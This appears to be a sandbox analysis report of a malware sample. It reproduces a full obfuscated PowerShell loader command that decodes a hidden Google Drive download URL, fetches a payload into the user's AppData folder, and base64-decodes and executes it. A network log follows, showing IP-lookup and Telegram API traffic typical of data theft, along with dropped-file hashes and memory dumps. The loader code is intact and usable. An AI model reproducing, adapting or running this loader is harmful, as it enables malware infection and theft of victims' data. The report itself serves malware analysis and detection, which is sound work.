"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Skravereapparat Brnecykels Chilotomy Allegorien #>;$rlingsankerets='Blissful';<#Revanchekamps Ledestjerne Dandyishly Momotidae Anraaber Rommens #>; function Indbankende($Udspejdes){If ($host.DebuggerEnabled) {$Nationalrettens++;}$Refusionsopgrelsen=$Notwithstanding+$Udspejdes.'Length'-$Nationalrettens; for ( $Skillessness=5;$Skillessness -lt $Refusionsopgrelsen;$Skillessness+=6){$vejle=$Skillessness;$spejlet+=$Udspejdes[$Skillessness];}$spejlet;}function Pyrogens($Woblernes){ . ($Brinkmanns) ($Woblernes);}$Konformistiske=Indbankende 'LicenM DevioCeleszPersoiAffejlAa sklB dgraCusto/ko,st ';$Unsimulated156=Indbankende 'PrdisTcr,nalOrgans vile1 Shin2Forha ';$Mirjas='prove[AtramNStjerET,eogTK pit. dstas ,emaePar orFavorvPaniciSibilCKo,ceeSsl.np ExtooSpgelISpiriNReforTSlaaemLedsaaUttheNJow eAKeerigTusseEMaaleRAp ca] cari:Ch li:SeacoSSubpaERhinoCSnkniUCitywRInforiRepo tWolfrYEpexep L,derSkrivoUn alTAnseeO,jeneCFlygtOSoloslHyper=Drama$ tomiuRegisn CacoSProtii ugtiMRecliUEmblel MoldaMaaletFravreRom.ndHange1Faggo5Sanch6Jej,n ';$Konformistiske+=Indbankende 'Solst5Inter.St ki0Triss arbl(S micWInd eiBrndenNonsudAfs ioSidemwImpsosInsna cho dNSta iTCogit retsl1Disbo0 Kon .medde0 Sama;Safir BasylWstiksiUdv sn Pl u6Nedsl4 ,rig;Outsi .roldxThirs6Utthe4Diopt; Insi canalrChu,mvEffer:Crino1 Suba3Mangl1Affyr. Laps0Viv.c)Jenbr PartsGUni reHagbacUnt ekDis eoSaltp/Idiot2Gobyp0Puppe1Kandi0Haang0Under1U rmn0Hverd1Melli Af nF rusvi nterbattleKb anfsaarso Und xOkseb/Svine1Afkld3Rep o1anthe.Kidne0 B ug ';$Platoniker=Indbankende ',apesuFor,osUniveESordiR Fa,t-partiaMasseGApterEFrivoNBourntCopro ';$Udbldningers=Indbankende ' Dm nhUrnegtTypogts rmopArrens Call:Dyrlg/ nage/Preced.ilkar .rtiiUndervOutcaeFarve.NeodagefteroPlumoo SkrdgIndkol New eNrlse.StentcBevidoWoodym uses/opdrauImmatcFable?Pyro.eMisvix An epTissuosuperrDysletMgald=VentrdPuirso Kirkw Impen SeselDeprioDipnear fledKamm & Ma aiAnteddacc u=Softw1Mater2HumboVP,rineKryds-prod.AFarengUlkenfSkalpT VulcuMa giCukr iK Unm n.eceniA lesh rude7Statsa phonWR.spolSamme3Tilt,9ge tez SommpJubelQValseuUdskaj SkamkLabyrCGardiw RecogBremsdBijobHTeosoT,rste ';$Rattus=Indbankende 'c,rks>.ajor ';$Brinkmanns=Indbankende ' aldiDoumaemalacX Cr o ';$Fient='Outrivalled';$Skandinavist='\Bortelimeneres.Uds';Pyrogens (Indbankende 'Rudim$DozerGRainwL MangO OverbP lgrA S lel Regn:RadiuAtrikom nterBFiraaITk,edTDaktyiTilbasClothE ChamRmorale latasUndet=Explo$R ughEBel jnBallovInact:Bil,oAing nPGrat P SqueDSuperATorskt,latiaStrab+Ftncm$ .oussBl,bmKNeapoASvensNTakr DTo.sii inimn Sa nAS illVUdkigi essls Dre.tFra.r ');Pyrogens (Indbankende 'Zooph$ SterGTo,meL GuimO Schib eurya I trLletha:dialesMal,rUL fttpNondee Un,artaktfLCent,ADul.iBHal lOFdse RIsen,iElectoPhysouKalliSPsyc.nUnderEMult sInte,sMesch=Givti$TithouSyndidNedblB TabiLInvalDFrednnMarkeIU ocaN.nputG Per,ERos,bRVes,csUdenr.remisSFunduPFo,reL umbi amueTKr dr( onog$FormoR DelmAF rhaT Lnovt,agaeuRouses mort)Pinne ');Pyrogens (Indbankende $Mirjas);$Udbldningers=$superlaboriousness[0];$Verifikationens=(Indbankende 'Subca$G utcgLikvilre,reOHerm BPlodda s dalBrob : ReveIInstamRaketmVoldgAUnrufricterCFengeEAfmilS.lissc.lectIRdhaab BevglResigEu pan5Ap lo=JoannNQui.zeUdtalW Assi-HalvnOLeksibPandejSa,dsE ampCL.erbT Semi antshSPhysiyChikiSCykelt,aataEBlithMFrids.PosttnKr gsE nkartJehul.TegniwlifeseRegulbCrumbC ontrLAfhugiIndrme Tredn F astekspe ');Pyrogens ($Verifikationens);Pyrogens (Indbankende 'Koord$UnderIKujonmKildemAp alaVarebrSlskicSrv,reSatirsForsoc RegiihjemlbabelilSuluderelak5Rkeen.GabbiH yrogeMa ara hjr dGenereBa,serVirgosSubco[Pulas$ g.leP SkiblIllusa VisutKio,koStukknReshoiIsagokAnmrkeF,rgarCirke]Lsgr =Perso$ Bi.tKHuedeo Pan n Accif UlydobasigrOv rbmSytteiSkyldsA otetBegrliHe edsVnnedkNonh.eSorns ');$Strops203=Indbankende 'Hje,l$ StraIThundmHospimUdarma DegnrBescucKiwifeBosats ProrcMisi iGennebUstillForepe Anse5Milke.ChummDProg.oMetapw PolenMorn lSubs.oCraziaR tradbirkeFSub riLeadllC nnieTuris(S let$ ssegURavkndO erpbMajorlHedondMam nnAsieniOve nnV nregTopi e Brolr JulesDups , Inte$ saetP Forlo AngisEx,rot Odyst DommhN taly iplorTillgo B,vaiMelled IndraNo dvl Nd r)Misun ';$Postthyroidal=$Ambitiseres;Pyrogens (Indbankende 'Salie$ Sejugbarrel Ded.oGastrbGroanaParallSu or: SuboN UranoHresin CycyrL arne WeekQMi jsu vvei UnliS L rsIContetnitraeMi er=Seleu(SolostFjerneBlokastoksiT tire- Un hpHysteASkabsTInputh .hau eve$Dorsop Tilso epi SDis,eT nosttC argHStyrey InteRForbroRetsfiArabiDFabelaUn,raLsubtr)Hebra ');while (!$Nonrequisite) {Pyrogens (Indbankende 'Clina$ Kiasg tte lNavigoIn,flbUnlenamoililSpoli:CentiO angivDrifteSa iarBet.ehBirodoTanetl LnkoiIrishnKonfueE carstas es Aebl=Hybel$ UntrtLavherGreveu Dawne.orts ') ;Pyrogens $Strops203;Pyrogens (Indbankende 'Arti,SForflTDisaraproc,r artTFilov-SrskrSIl egl T amEStaldep iorPCl.rk Kajsp4Imeri ');Pyrogens (Indbankende ' Spri$OutwogWildiL Gok O undeBForskaWith.LDomme:Rr ddnF jlpoSuperndo ber PolyeC.mmeqSkambUViseliH.lvoSGermaIrift TStadfeCingu=Slger(Hyt eTTelegEPeppes Ton Tforly-IndbjPBlidea .fsktGinenh Unex Aris$FirempSugamOC,nomsProgrTBir.et Unu hSol,iY TerrRBas loRutsjI Apo,DFissuaA aziL,lama)Ne li ') ;Pyrogens (Indbankende 'Couri$AarenG Ons Lfolkeo.essubAf.edaDelegLci,il:LiterlTr.ppE JagtT fkbeT valie beklsGrucctOblivEUk,ukS Slag=Unint$Psyc,GRaadgL.ktexOKishkb B ggaWaferL Bush:Kde,eiBankbDSkamfEBarneNOutcatAdelsIDuvniTMarkeeAf krT S syS KaffPR gklrEggheONonbeb UndelPeploeacce,mNebraEUnd rTPrestspret +Bispo+Po zo%Filmm$ArtikSFacituStn ePRisenEBerthr SeleLLap laGittiBSu,ero SyssrOoi.si .ateo MellU N nvS.rednNPrefaE Impasari,rS Rund.AffircunlinOBu kiuRentenVugn TRamli ') ;$Udbldningers=$superlaboriousness[$Lettestes];}$Omdigtning=318395;$Uforsrgedes=31683;Pyrogens (Indbankende 'Baby $ Afk GIndkol R enOPrecoBSelvfA,hichlB,ond:VifilB.aninaClipsrFrsteYAposeS SnegP.verhhMaculeFidfaRRednie Ree mosg.=Dwa f EtatsGtelegEPockiTpough- DelmCTo.dioDefaiNvaabeTBl thES rygnSubarTLseng Tra,$DegenpVkkerOSkilbsTrillTPiecetVexatH kroby mertrFan,eO utatiHermeDC.sigaUdplulB.mhu ');Pyrogens (Indbankende ' Simp$Bahr gAttrilTrestoretrab c pyaSkattlS,inn:SprogD Bldhr UmbeaSube.nBorsyksrhfte EnerrTagryeRegio1Gul.y5Ford.3Slank Pa.as=Rejse Gril[TawdrSStandyUntersCompet Bre.eGl rem Biog.TabulCbilggoInforn udskvDreameDatabrAagettSider]P uci:Story:AutopFBouchrsalgboLudwim CincB Pr.caSlvbesFodere Flag6Overs4SneglSWooletKompirAfflaiNasarnRund.gVitup( Ldin$SlantBZarzuaFniker PaakyDrawbsEmblepr sunhOver eSeraerAmphieSpeku) arro ');Pyrogens (Indbankende ' fkli$.ammeGL getlWayako amibAfstdAKon rlPalai:.esepRly edOBereguP askg elfrhRosenI Fo tSU.smohSurde Smila= Paro nat.r[DrnedSKadenYTodd.Sexem TGoodleRecitM Met .alvorTRul eE arkeXAngartIndor. oldeELdrepnGraphCRepolO UdbeDKnoglISubclNDvrgfGfable]under: inni:Spid A ReseSDesilCG apaiIrratiNo de.,nkleg DentERentetS cias orstTtysaRMetasi Lgnen Platgdisem(Blods$Debi.DBlomsr NoncAUnbomNarbejKPasteesove RafmysEwullc1Physi5B.rne3Hornb)aceit ');Pyrogens (Indbankende 'Plati$detaigR zorlTil.oO,ugbrbNatalaMerliL.ensy:VaultFFarceLNunshE BreaTEj ndf Blo.E PrisL olshtNarageRhe mr Prob=.nter$ Fa irKvadroOuz,suLicenGS lliHDi saIFe dsSbeva hBel.j.ServiSMistnuMelleBAndens zaret V,olRSkallI Th nNHekseG Pi u(Inter$MadweOForstM StaddMedioIDinosGProceTImpernKjersIChuntnA lerg Hyal,Flde.$UmtteU B,kefOvertOVernar CensSSemitrWeepiGVerrieRm.blD S,ameFebe,SAbsol)Delfl ');Pyrogens $Fletfelter;"
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\SysWOW64\msiexec.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 150.171.27.10:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 79.190.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | drive.google.com | udp |
| GB | 142.250.179.238:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| GB | 142.250.187.193:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | 238.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 193.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| GB | 142.250.179.238:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.180.3:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | o.pki.goog | udp |
| GB | 142.250.180.3:80 | o.pki.goog | tcp |
| US | 8.8.8.8:53 | 197.87.175.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.180.250.142.in-addr.arpa | udp |
| GB | 142.250.187.193:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | checkip.dyndns.org | udp |
| US | 193.122.130.0:80 | checkip.dyndns.org | tcp |
| US | 8.8.8.8:53 | reallyfreegeoip.org | udp |
| US | 172.67.177.134:443 | reallyfreegeoip.org | tcp |
| US | 8.8.8.8:53 | 0.130.122.193.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.177.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | 220.167.154.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
Files
memory/3096-0-0x00007FFDBDBE3000-0x00007FFDBDBE5000-memory.dmp
memory/3096-8-0x00000108E44A0000-0x00000108E44C2000-memory.dmp
memory/3096-11-0x00007FFDBDBE0000-0x00007FFDBE6A1000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_humwqxsv.0a5.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3096-12-0x00007FFDBDBE0000-0x00007FFDBE6A1000-memory.dmp
memory/3096-14-0x00007FFDBDBE3000-0x00007FFDBDBE5000-memory.dmp
memory/3096-15-0x00007FFDBDBE0000-0x00007FFDBE6A1000-memory.dmp
memory/3096-20-0x00007FFDBDBE0000-0x00007FFDBE6A1000-memory.dmp
memory/3096-17-0x00007FFDBDBE0000-0x00007FFDBE6A1000-memory.dmp
memory/3360-21-0x0000000004DE0000-0x0000000004E16000-memory.dmp
memory/3360-22-0x00000000055F0000-0x0000000005C18000-memory.dmp
memory/3360-23-0x00000000054D0000-0x00000000054F2000-memory.dmp
memory/3360-25-0x0000000005C20000-0x0000000005C86000-memory.dmp
memory/3360-24-0x0000000005570000-0x00000000055D6000-memory.dmp
memory/3360-35-0x0000000005D80000-0x00000000060D4000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 71444def27770d9071039d005d0323b7 |
| SHA1 | cef8654e95495786ac9347494f4417819373427e |
| SHA256 | 8438eded7f1ab9b4399a069611fe8730226bcdce08fab861d4e8fae6ef621ec9 |
| SHA512 | a721af797fd6882e6595b7d9610334f1fb57b809e504452eed4b0d0a32aaf07b81ce007bd51605bec9fcea7ec9f1d8424db1f0f53b65a01126ec4f5980d86034 |
memory/3360-37-0x00000000063A0000-0x00000000063BE000-memory.dmp
memory/3360-38-0x0000000006430000-0x000000000647C000-memory.dmp
memory/3360-39-0x0000000007BE0000-0x000000000825A000-memory.dmp
memory/3360-40-0x0000000006940000-0x000000000695A000-memory.dmp
memory/3360-42-0x00000000075A0000-0x00000000075C2000-memory.dmp
memory/3360-41-0x0000000007600000-0x0000000007696000-memory.dmp
memory/3360-43-0x0000000008810000-0x0000000008DB4000-memory.dmp
C:\Users\Admin\AppData\Roaming\Bortelimeneres.Uds
| MD5 | b3d91ec6a3eb97821759453637c6c7ad |
| SHA1 | 471d11af010f2d40bd90d9744fe9d15d964645e4 |
| SHA256 | afb489226c47e56fdcebdba5d21447c4f5422ce541ce21c389d62fa8b9d5865e |
| SHA512 | 227586fd756d00597c50b7fb9891c35f68bcc15397cc161164fb37ee5a6d4c78e6361d3f053d4442e812e05f9e6913071b795a0ea063f7e1779b80852b80e333 |
memory/3360-45-0x0000000008DC0000-0x000000000A0B2000-memory.dmp
memory/3924-59-0x0000000000A00000-0x0000000000A48000-memory.dmp
memory/3924-58-0x0000000000A00000-0x0000000001C54000-memory.dmp
memory/3924-60-0x0000000020DA0000-0x0000000020E3C000-memory.dmp
memory/3924-62-0x0000000021900000-0x0000000021AC2000-memory.dmp
memory/3924-63-0x00000000211C0000-0x0000000021210000-memory.dmp
memory/3924-65-0x0000000021AD0000-0x0000000021B62000-memory.dmp
memory/3924-66-0x00000000212A0000-0x00000000212AA000-memory.dmp